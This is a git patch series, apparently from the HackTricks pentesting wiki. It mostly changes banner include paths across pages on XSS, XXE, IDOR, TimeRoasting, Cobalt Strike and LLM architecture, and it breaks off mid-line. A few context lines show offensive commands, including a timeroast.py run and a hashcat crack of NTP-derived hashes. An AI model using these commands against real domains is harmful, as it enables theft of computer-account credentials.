b/src/network-services-pentesting/pentesting-web/spring-actuators.md index 8bdaabc31..164be26bf 100644 --- a/src/network-services-pentesting/pentesting-web/spring-actuators.md +++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md @@ -68,4 +68,4 @@ Connection: close -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md index 3d3e304b7..4ba103e46 100644 --- a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md +++ b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md @@ -56,4 +56,4 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\ -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md index 821eee470..32ef75d5d 100644 --- a/src/pentesting-web/idor.md +++ b/src/pentesting-web/idor.md @@ -86,4 +86,4 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index fd189e10d..d690529aa 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,6 @@ # XSS (Cross Site Scripting) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Methodology diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md index 16ddab263..96ff08913 100644 --- a/src/todo/hardware-hacking/fault_injection_attacks.md +++ b/src/todo/hardware-hacking/fault_injection_attacks.md @@ -1,6 +1,6 @@ # Fault Injection Attacks -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits. @@ -8,4 +8,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md index 8eaaac3e6..6ac9fa741 100644 --- a/src/todo/hardware-hacking/side_channel_analysis.md +++ b/src/todo/hardware-hacking/side_channel_analysis.md @@ -1,6 +1,6 @@ # Side Channel Analysis Attacks -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example: @@ -10,4 +10,4 @@ These attacks are very popular in case of leaking data such as private keys or f -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md index 103246196..a09ea2c1f 100644 --- a/src/todo/industrial-control-systems-hacking/README.md +++ b/src/todo/industrial-control-systems-hacking/README.md @@ -1,6 +1,6 @@ # Industrial Control Systems Hacking -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## About this Section @@ -18,5 +18,5 @@ These techniques can also be used to protect against attacks and blue teaming fo -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md index 711d6618a..9f044e573 100644 --- a/src/todo/industrial-control-systems-hacking/modbus.md +++ b/src/todo/industrial-control-systems-hacking/modbus.md @@ -1,6 +1,6 @@ # The Modbus Protocol -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Introduction to Modbus Protocol @@ -34,6 +34,6 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md index 1978773b1..2added321 100644 --- a/src/todo/investment-terms.md +++ b/src/todo/investment-terms.md @@ -1,6 +1,6 @@ # Investment Terms -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Spot @@ -71,4 +71,4 @@ However, the buyer will be paying some fee to the seller for opening the option -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/radio-hacking/README.md b/src/todo/radio-hacking/README.md index f49b99426..42011e5a4 100644 --- a/src/todo/radio-hacking/README.md +++ b/src/todo/radio-hacking/README.md @@ -1,6 +1,6 @@ # Radio Hacking -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md index 5aff81ce1..f9cfc1334 100644 --- a/src/todo/radio-hacking/fissure-the-rf-framework.md +++ b/src/todo/radio-hacking/fissure-the-rf-framework.md @@ -1,6 +1,6 @@ # FISSURE - The RF Framework -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} **Frequency Independent SDR-based Signal Understanding and Reverse Engineering** @@ -187,5 +187,5 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md index 47acd042d..5f78a9154 100644 --- a/src/todo/rust-basics.md +++ b/src/todo/rust-basics.md @@ -1,6 +1,6 @@ # Rust Basics -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ### Generic Types @@ -320,5 +320,5 @@ fn main() { ``` -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md index aadf1ff19..751db9fd9 100644 --- a/src/todo/test-llms.md +++ b/src/todo/test-llms.md @@ -1,6 +1,6 @@ # Test LLMs -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Run & train models locally @@ -52,5 +52,5 @@ It offers several sections like: * **API Access:** Simple APIs for running models the enable developers to deploy and scale models effortlessly within their own applications. -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/TimeRoasting.md b/src/windows-hardening/active-directory-methodology/TimeRoasting.md index 6311a1c89..d92f0064b 100644 --- a/src/windows-hardening/active-directory-methodology/TimeRoasting.md +++ b/src/windows-hardening/active-directory-methodology/TimeRoasting.md @@ -1,6 +1,6 @@ # TimeRoasting -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP. In this mechanism, clients can directly use any computer account's Relative Identifier (RID), and the domain controller will use the computer account's NTLM hash (generated by MD4) as the key to generate the **Message Authentication Code (MAC)** of the response packet. @@ -39,4 +39,4 @@ sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt hashcat -m 31300 ntp-hashes.txt ``` -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md index 69ccc8cc6..94e4cf8a3 100644 --- a/src/windows-hardening/cobalt-strike.md +++ b/src/windows-hardening/cobalt-strike.md @@ -1,6 +1,6 @@ # Cobalt Strike -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ### Listeners @@ -371,5 +371,5 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} From 3ad9a55c92acc2d9409bf02fabaedd90f1e60d58 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sat, 12 Jul 2025 11:50:55 +0200 Subject: [PATCH 7/8] f --- src/pentesting-web/xxe-xee-xml-external-entity.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index b689b1345..3c3dfb426 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -1,10 +1,5 @@ # XXE - XEE - XML External Entity -{{#include /banners/hacktricks-training.md}} - -- [Dojo CTF Challenge #42 – Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42) -- [lxml bug #2107279 – Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279) - {{#include ../banners/hacktricks-training.md}} ## XML Basics From 92a9bc7b123e4508a99e1d226c2da42caecdc87f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 12 Jul 2025 10:50:06 +0000 Subject: [PATCH 8/8] Add content from: Research Update: Enhanced src/todo/radio-hacking/low-power-w... --- .../0.-basic-llm-concepts.md | 4 +- src/AI/AI-llm-architecture/1.-tokenizing.md | 4 +- .../AI-llm-architecture/2.-data-sampling.md | 4 +- .../3.-token-embeddings.md | 4 +- .../4.-attention-mechanisms.md | 5 +- .../5.-llm-architecture.md | 4 +- .../6.-pre-training-and-loading-models.md | 4 +- .../7.0.-lora-improvements-in-fine-tuning.md | 4 +- .../7.1.-fine-tuning-for-classification.md | 4 +- ...7.2.-fine-tuning-to-follow-instructions.md | 4 +- src/AI/AI-llm-architecture/README.md | 4 +- .../arbitrary-write-2-exec/README.md | 3 +- .../aw2exec-sips-icc-profile.md | 2 +- src/binary-exploitation/array-indexing.md | 2 +- .../bf-forked-stack-canaries.md | 2 +- src/binary-exploitation/ios-exploiting.md | 4 +- src/binary-exploitation/libc-heap/README.md | 4 +- .../libc-heap/use-after-free/first-fit.md | 2 +- .../discord-invite-hijacking.md | 2 +- .../threat-modeling.md | 5 +- .../macos-dangerous-entitlements.md | 4 +- .../android-app-pentesting/flutter.md | 2 +- .../ios-pentesting-without-jailbreak.md | 2 +- .../1414-pentesting-ibmmq.md | 2 +- .../pentesting-ntp.md | 2 +- .../pentesting-web/angular.md | 5 +- .../pentesting-web/django.md | 4 +- .../pentesting-web/laravel.md | 5 +- .../pentesting-web/nodejs-express.md | 5 +- .../pentesting-web/spring-actuators.md | 4 +- .../dapps-DecentralizedApplications.md | 5 +- .../lfi2rce-via-nginx-temp-files.md | 18 ++-- src/pentesting-web/idor.md | 4 +- .../xss-cross-site-scripting/README.md | 2 +- .../fault_injection_attacks.md | 4 +- .../hardware-hacking/side_channel_analysis.md | 4 +- .../README.md | 5 +- .../modbus.md | 5 +- src/todo/investment-terms.md | 4 +- src/todo/radio-hacking/README.md | 3 +- .../radio-hacking/fissure-the-rf-framework.md | 5 +- .../low-power-wide-area-network.md | 94 +++++++++++++++++-- src/todo/rust-basics.md | 5 +- src/todo/test-llms.md | 5 +- .../TimeRoasting.md | 4 +- .../printnightmare.md | 4 +- src/windows-hardening/cobalt-strike.md | 5 +- 47 files changed, 174 insertions(+), 108 deletions(-) diff --git a/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md b/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md index 83ce8371c..b0d2a60e6 100644 --- a/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md +++ b/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md @@ -1,6 +1,6 @@ # 0. Basic LLM Concepts -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Pretraining @@ -300,4 +300,4 @@ During the backward pass: - **Accuracy:** Provides exact derivatives up to machine precision. - **Ease of Use:** Eliminates manual computation of derivatives. -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/1.-tokenizing.md b/src/AI/AI-llm-architecture/1.-tokenizing.md index 7e4ae9818..2c29f7c2b 100644 --- a/src/AI/AI-llm-architecture/1.-tokenizing.md +++ b/src/AI/AI-llm-architecture/1.-tokenizing.md @@ -1,6 +1,6 @@ # 1. Tokenizing -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Tokenizing @@ -99,4 +99,4 @@ print(token_ids[:50]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/2.-data-sampling.md b/src/AI/AI-llm-architecture/2.-data-sampling.md index 42d43f051..658e7a834 100644 --- a/src/AI/AI-llm-architecture/2.-data-sampling.md +++ b/src/AI/AI-llm-architecture/2.-data-sampling.md @@ -1,6 +1,6 @@ # 2. Data Sampling -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## **Data Sampling** @@ -241,4 +241,4 @@ tensor([[ 367, 2885, 1464, 1807], - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/3.-token-embeddings.md b/src/AI/AI-llm-architecture/3.-token-embeddings.md index b0d34dc2e..952b9197e 100644 --- a/src/AI/AI-llm-architecture/3.-token-embeddings.md +++ b/src/AI/AI-llm-architecture/3.-token-embeddings.md @@ -1,6 +1,6 @@ # 3. Token Embeddings -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Token Embeddings @@ -219,4 +219,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/4.-attention-mechanisms.md b/src/AI/AI-llm-architecture/4.-attention-mechanisms.md index 9f73a4eec..76aa936d7 100644 --- a/src/AI/AI-llm-architecture/4.-attention-mechanisms.md +++ b/src/AI/AI-llm-architecture/4.-attention-mechanisms.md @@ -1,6 +1,6 @@ # 4. Attention Mechanisms -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Attention Mechanisms and Self-Attention in Neural Networks @@ -430,5 +430,4 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/5.-llm-architecture.md b/src/AI/AI-llm-architecture/5.-llm-architecture.md index 7e375b6f6..dc8288383 100644 --- a/src/AI/AI-llm-architecture/5.-llm-architecture.md +++ b/src/AI/AI-llm-architecture/5.-llm-architecture.md @@ -1,6 +1,6 @@ # 5. LLM Architecture -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## LLM Architecture @@ -702,4 +702,4 @@ print("Output length:", len(out[0])) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md b/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md index 4ebc737e9..6f430fd62 100644 --- a/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md +++ b/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md @@ -1,6 +1,6 @@ # 6. Pre-training & Loading models -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Text Generation @@ -971,4 +971,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md b/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md index 24d1f900d..3955d432a 100644 --- a/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md +++ b/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md @@ -1,6 +1,6 @@ # 7.0. LoRA Improvements in fine-tuning -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## LoRA Improvements @@ -64,4 +64,4 @@ def replace_linear_with_lora(model, rank, alpha): - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md b/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md index 98df3b564..efeba7a45 100644 --- a/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md +++ b/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md @@ -1,6 +1,6 @@ # 7.1. Fine-Tuning for Classification -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## What is @@ -117,4 +117,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https:// - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md b/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md index 1398b73d5..298906836 100644 --- a/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md +++ b/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md @@ -1,6 +1,6 @@ # 7.2. Fine-Tuning to follow instructions -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} > [!TIP] > The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot. @@ -107,4 +107,4 @@ You can find an example of the code to perform this fine tuning in [https://gith - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/README.md b/src/AI/AI-llm-architecture/README.md index 8d18bf89d..b8da5e211 100644 --- a/src/AI/AI-llm-architecture/README.md +++ b/src/AI/AI-llm-architecture/README.md @@ -1,6 +1,6 @@ # LLM Training - Data Preparation -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} **These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.** @@ -99,4 +99,4 @@ You should start by reading this post for some basic concepts you should know ab 7.2.-fine-tuning-to-follow-instructions.md {{#endref}} -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md index 207dbba64..750760570 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/README.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md @@ -1,6 +1,5 @@ # Arbitrary Write 2 Exec -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md index bc6d6480a..e8225d8fd 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md @@ -52,4 +52,4 @@ Successful exploitation results in remote arbitrary code execution at user privi - Apple October 2024 Security Update (patch shipping CVE-2024-44236) https://support.apple.com/en-us/121564 -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md index 12c30102b..6c3a37e22 100644 --- a/src/binary-exploitation/array-indexing.md +++ b/src/binary-exploitation/array-indexing.md @@ -20,4 +20,4 @@ However he you can find some nice **examples**: -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 0ec3de2d3..9a852199d 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -123,4 +123,4 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index d97f353f8..953950986 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md @@ -1,6 +1,6 @@ # iOS Exploiting -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ## Physical use-after-free @@ -213,4 +213,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) { With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 7ebab0f69..5fe3757f9 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -1,6 +1,6 @@ # Libc Heap -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Heap Basics @@ -531,4 +531,4 @@ heap-memory-functions/heap-functions-security-checks.md - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md index c90112b42..d74bacb45 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md +++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md @@ -66,4 +66,4 @@ d = malloc(20); // a -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md index 5fa7203cf..a7b5f902f 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md @@ -60,4 +60,4 @@ This approach avoids direct file downloads and leverages familiar UI elements to - From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/ - Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/threat-modeling.md b/src/generic-methodologies-and-resources/threat-modeling.md index 3ed08bd94..87bf50c2a 100644 --- a/src/generic-methodologies-and-resources/threat-modeling.md +++ b/src/generic-methodologies-and-resources/threat-modeling.md @@ -1,6 +1,6 @@ # Threat Modeling -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} ## Threat Modeling @@ -113,5 +113,4 @@ Now your finished model should look something like this. And this is how you mak This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index cf4dd992e..629d72108 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -166,11 +166,11 @@ Allow the process to **ask for all the TCC permissions**. ### **`kTCCServicePostEvent`** -{{#include ../../../banners/hacktricks-training.md}} + -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/flutter.md b/src/mobile-pentesting/android-app-pentesting/flutter.md index 907176652..20ae431fc 100644 --- a/src/mobile-pentesting/android-app-pentesting/flutter.md +++ b/src/mobile-pentesting/android-app-pentesting/flutter.md @@ -80,4 +80,4 @@ Flutter itself **ignores device proxy settings**. Easiest options: - [https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/](https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/) -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 791da2761..1f226fae0 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md index 68aab11f2..64eef8b2c 100644 --- a/src/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md @@ -364,4 +364,4 @@ CONTAINER ID IMAGE COMMAND CRE -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index c330fe2e9..bfc1e6851 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -195,4 +195,4 @@ Entry_2: - Khronos/Chronos draft (time-shift mitigation) - chronyc manual/examples for remote monitoring - zgrab2 ntp module docs -{{#include /src/banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index ff1648acb..9a8042d7c 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md @@ -1,6 +1,6 @@ # Angular -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## The Checklist @@ -616,5 +616,4 @@ According to the W3C documentation, the `window.location` and `document.location -{{#include /src/banners/hacktricks-training.md}} - +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md index febaec344..90c75a794 100644 --- a/src/network-services-pentesting/pentesting-web/django.md +++ b/src/network-services-pentesting/pentesting-web/django.md @@ -1,6 +1,6 @@ # Django -{{#include /src/banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} ## Cache Manipulation to RCE Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is 